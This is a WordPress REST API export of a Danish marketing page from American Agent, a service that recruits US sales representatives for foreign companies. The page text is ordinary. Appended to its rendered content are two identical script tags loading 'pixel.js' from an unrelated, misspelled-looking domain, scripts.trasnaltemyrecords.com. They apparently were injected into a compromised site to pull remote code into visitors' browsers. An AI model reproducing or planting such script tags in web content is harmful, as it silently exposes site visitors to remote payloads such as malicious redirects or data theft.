{"id":3147,"date":"2014-08-16T07:17:35","date_gmt":"2014-08-16T07:17:35","guid":{"rendered":"https:\/\/americanagent.com\/sales-representative-search-2\/"},"modified":"2014-09-04T12:08:00","modified_gmt":"2014-09-04T16:08:00","slug":"sogning-af-salgsrepraesentanter","status":"publish","type":"page","link":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/","title":{"rendered":"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-8261f2ea6d35d13435ec9509d1d2e106\">\n#top .av-special-heading.av-av_heading-8261f2ea6d35d13435ec9509d1d2e106{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-8261f2ea6d35d13435ec9509d1d2e106 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-8261f2ea6d35d13435ec9509d1d2e106 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-8261f2ea6d35d13435ec9509d1d2e106 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >S\u00d8GNING AF SALGSREPR\u00c6SENTANTER<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-6bbb9745c24ef102d1f3feabac50c46d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>At ans\u00e6tte erfarne og trov\u00e6rdige USA salgsrepr\u00e6sentanter er formentlig den st\u00e6rkeste m\u00e5de at tr\u00e6nge ind p\u00e5 USA&#8217;s marked p\u00e5. Nogle gange kr\u00e6ver situationen en s\u00e5dan tilgang med det samme.<\/p>\n<p>Vi er i stand til at finde amerikanske salgsrepr\u00e6sentanter og andre professionelle p\u00e5 landsd\u00e6kkende plan, indenfor enhver industri, og p\u00e5 hvilken som helst erfarings niveau.<\/p>\n<p>Vi kan finde og hj\u00e6lpe dig med at f\u00e5 et partnerskab med solide professionelle s\u00e6lgere 100% loyale over for din virksomhed.<\/p>\n<p>Amerikanske salgsrepr\u00e6sentanter kan v\u00e6re meget forsigtige med at engagere udenlandske selskaber, til tider er den bedste kandidat tabt under de afsluttende forhandlinger, fordi selskabet ikke forst\u00e5 nogle af de sp\u00f8rgsm\u00e5l, som er vigtige for amerikanske salgsrepr\u00e6sentanter (sygeforsikring sp\u00f8rgsm\u00e5l for eksempel), og til tider kan det v\u00e6re ganske sv\u00e6rt at komme forbi disse sm\u00e5 forhindringer.<\/p>\n<p>Vi forst\u00e5r godt deres bekymring og er ogs\u00e5 i stand til at forklare dig betydningen af disse sp\u00f8rgsm\u00e5l, s\u00e5 du forst\u00e5r deres tankegang. Vi ved, hvordan man kan overvinde disse situationer.<\/p>\n<p>Vi nyder at diskutere med amerikanske repr\u00e6sentanter, at indf\u00f8re en gangs muligheder og virksomheder med gode produkter. De kan ogs\u00e5 forst\u00e5r fordelene ved at v\u00e6re et af dine f\u00f8rste salgsrepr\u00e6sentanter p\u00e5 det amerikanske marked.<\/p>\n<p>Vi bruger de samme kilder som de lokale amerikanske personale ansvarlige g\u00f8r og &#8220;Headhuntere&#8221;. Men vi tilbyder en meget bedre \u00f8konomisk l\u00f8sning, og udf\u00f8rer kun disse meget specifikke s\u00f8gninger af salgsrepr\u00e6sentanter med forst\u00e5else for din internationale position.<\/p>\n<p>Dette projekt kan naturligvis variere afh\u00e6ngigt af antallet af n\u00f8dvendige repr\u00e6sentanter eller hvor stort omr\u00e5de der er tale om.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3147","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>S\u00d8GNING AF SALGSREPR\u00c6SENTANTER - American Agent - USA Sales Services and Distributor Search Services<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/\" \/>\n<meta property=\"og:locale\" content=\"da_DK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER - American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-04T16:08:00+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-salgsrepraesentanter\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-salgsrepraesentanter\\\/\",\"name\":\"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER - American Agent - USA Sales Services and Distributor Search Services\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:35+00:00\",\"dateModified\":\"2014-09-04T16:08:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-salgsrepraesentanter\\\/#breadcrumb\"},\"inLanguage\":\"da-DK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-salgsrepraesentanter\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/sogning-af-salgsrepraesentanter\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/da\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/da\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/da\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"da-DK\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER - American Agent - USA Sales Services and Distributor Search Services","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/","og_locale":"da_DK","og_type":"article","og_title":"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER - American Agent - USA Sales Services and Distributor Search Services","og_url":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-04T16:08:00+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/","url":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/","name":"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER - American Agent - USA Sales Services and Distributor Search Services","isPartOf":{"@id":"https:\/\/americanagent.com\/da\/#website"},"datePublished":"2014-08-16T07:17:35+00:00","dateModified":"2014-09-04T16:08:00+00:00","breadcrumb":{"@id":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/#breadcrumb"},"inLanguage":"da-DK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/da\/sogning-af-salgsrepraesentanter\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/da\/"},{"@type":"ListItem","position":2,"name":"S\u00d8GNING AF SALGSREPR\u00c6SENTANTER"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/da\/#website","url":"https:\/\/americanagent.com\/da\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/da\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"da-DK"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/3147","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/comments?post=3147"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/pages\/3147\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/da\/wp-json\/wp\/v2\/media?parent=3147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}